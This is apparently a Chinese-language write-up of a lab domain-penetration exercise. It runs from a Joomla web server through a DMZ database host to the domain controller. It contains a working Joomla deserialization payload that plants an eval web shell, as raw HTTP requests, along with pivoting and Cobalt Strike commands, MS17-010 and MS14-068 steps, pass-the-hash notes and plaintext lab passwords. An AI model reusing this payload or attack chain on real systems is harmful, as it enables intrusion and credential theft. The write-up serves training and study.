復盤線下域滲透環境Write Up
0x01 外網web到DMZ進域
外網web入口
joomla應用 192.168.0.5
反序列化打下來
GET /index.php HTTP/1.1 Host: 192.168.0.5 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 x-forwarded-for: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}ð Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: 80769d143cf4e67e347c880ead30ac73=djsjbbmhgdsrk6dn0iad8v19u2; b812b2d89fbf4cac6fc4b47aa2976990=hicdivfaafd7h0d29oj2d60v47 Connection: close Upgrade-Insecure-Requests: 1
POST /index.php HTTP/1.1 Host: 192.168.0.5 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 3 Cookie: 80769d143cf4e67e347c880ead30ac73=djsjbbmhgdsrk6dn0iad8v19u2; b812b2d89fbf4cac6fc4b47aa2976990=hicdivfaafd7h0d29oj2d60v47 Connection: close Upgrade-Insecure-Requests: 1 111=cGhwaW5mbygpOw%3d%3d
拿到這台web1權限后 發現站庫分離 mysql數據庫為同192段的192.168.0.6
發現是root用戶
UDF提權拿到web1-DB的權限。
直連192.168.0.6發現有限制,所以通過web1服務器代理連接web1-db
查看secure_file_priv
root用戶直接改
mysql 5.6.34版本以后 secure_file_priv的值默認為NULL
真實比賽時候這里是給改了的 ,不過也可以使用慢查詢getshell 而且web1和web1-db本地管理密碼是可以撞出來的 。
web1-db在192段測試可以出外網的 點馬
這台db權限穩了以后,打dmz進域。
然后發現web1-db雙網卡 有10段的ip 掃描存活發現10.0.0.4開放80 開socks代理打這台web
工具無所謂 ew這些一樣的。
掃描目錄發現shell.php為一句話 可嘗試爆破 cms采用tp3 后台爆破后存在弱口令
登錄后台發現界面功能中的模版管理 getshell
至此看到域。
C:\phpStudy\PHPTutorial\WWW\> ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : corework-websrv1 Primary Dns Suffix . . . . . . . : corework.com Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : corework.com Ethernet adapter 本地連接 2: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2 Physical Address. . . . . . . . . : 00-0C-29-10-EF-5A DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.0.5 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.0.0 DNS Servers . . . . . . . . . . . : 8.8.8.8 Ethernet adapter 本地連接: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection Physical Address. . . . . . . . . : 00-0C-29-10-EF-50 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 10.0.0.4 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.0.0.0 DNS Servers . . . . . . . . . . . : 10.0.0.3
0x02 域內橫向
這里域內web可以直接出外網 還是寬松了很多 。
而大多時候域中很多服務器出不了外網 只有跳板訪問,這里就不直接反彈外網了,假設這里並不能直接出外網,種個正向跳板。
run sc \\10.0.0.4 config msdtc obj=localsystem run sc \\10.0.0.4 stop msdtc run sc \\10.0.0.4 start msdtc link 10.0.0.4
域中第一台web也就是srv1穩下來后 進行橫向擴權限 探測發現10段中存在以下主機
10.0.0.4 win2003
10.0.0.3 win2008 DC
10.0.0.8 win7
嘗試抓密碼
cs自帶的只能部分 上exe的
web1密碼:
本機: administrator / CQXzxc!11 域成員; webadmin / web#Admin998
打了1997補丁還是可以pth傳遞 這里直接有明文 撞。
哈希傳遞發現同webadmin帳號可登錄另一台win2003 srv2 10.0.0.5
而在這台上發現vpn撥號 以及172段的網卡。
Windows IP Configuration Host Name . . . . . . . . . . . . : corework-09b6ed Primary Dns Suffix . . . . . . . : corework.com Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : corework.com Ethernet adapter VPN - VPN Client: Media State . . . . . . . . . . . : Media disconnected Description . . . . . . . . . . . : VPN Client Adapter - VPN Physical Address. . . . . . . . . : 00-AC-94-F1-A2-1E Ethernet adapter 本地連接: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connecti Physical Address. . . . . . . . . : 00-0C-29-0B-DC-77 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 10.0.0.5 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.0.0.0 DNS Servers . . . . . . . . . . . : 10.0.0.3
10.0.0.5 srv2密碼:
本機: administrator / ojx%987AAA 域成員; webadmin / web#Admin998
10.0.0.5的機子撞密碼得到win7(10.0.0.8)權限:
dir \\10.0.0.8\c$ \\10.0.0.8\c$ 的目錄 2019/11/14 23:02 0 AUTOEXEC.BAT 2019/11/14 23:02 0 CONFIG.SYS 2019/11/18 01:33 <DIR> Documents and Settings 2019/11/24 07:40 <DIR> mimikatz 2019/11/24 07:40 <DIR> mimikatz_trunk 2019/11/15 14:25 <DIR> Program Files 2019/11/18 01:33 <DIR> WINDOWS 2019/11/14 23:03 <DIR> wmpub 2 個文件 0 字節 6 個目錄 39,359,496,192 可用字節
這里的win7可以直接出來,所以可以再點個反向,但是如果出不來 又要做一層代理 三層代理 用win7打域控
這里域內主機都開了445 所以17010必須嘗試 無果后嘗試14068
這里直接開的3389 來14068攻擊
生成憑據:
傳遞內存:
拿到域控DC.
srv2這台還發現vpn的172段 撥過去。
撥進去發現172.16段存在另一台win7 172.16.0.6
嘗試17010 拿到權限。
C:\Users\Administrator>hostname WIN-6DPULQIIMAD C:\Users\Administrator>whoami win-6dpulqiimad\administrator C:\Users\Administrator>ipconfig Windows IP 配置 以太網適配器 VPN - VPN Client: 媒體狀態 . . . . . . . . . . . . : 媒體已斷開 連接特定的 DNS 后綴 . . . . . . . : 以太網適配器 本地連接: 連接特定的 DNS 后綴 . . . . . . . : 本地鏈接 IPv6 地址. . . . . . . . : fe80::d53e:8c8:e908:65d1%11 IPv4 地址 . . . . . . . . . . . . : 172.16.0.6 子網掩碼 . . . . . . . . . . . . : 255.255.255.0 默認網關. . . . . . . . . . . . . : 172.16.0.0 隧道適配器 isatap.{B8A8B4D0-D928-4B6C-BBB5-169CD3DD0A56}: 媒體狀態 . . . . . . . . . . . . : 媒體已斷開 連接特定的 DNS 后綴 . . . . . . . : 隧道適配器 isatap.{171C28A5-5AAC-40B1-A703-5653E5691E94}: 媒體狀態 . . . . . . . . . . . . : 媒體已斷開 連接特定的 DNS 后綴 . . . . . . . :
結束。
最后的這次域滲透結構圖
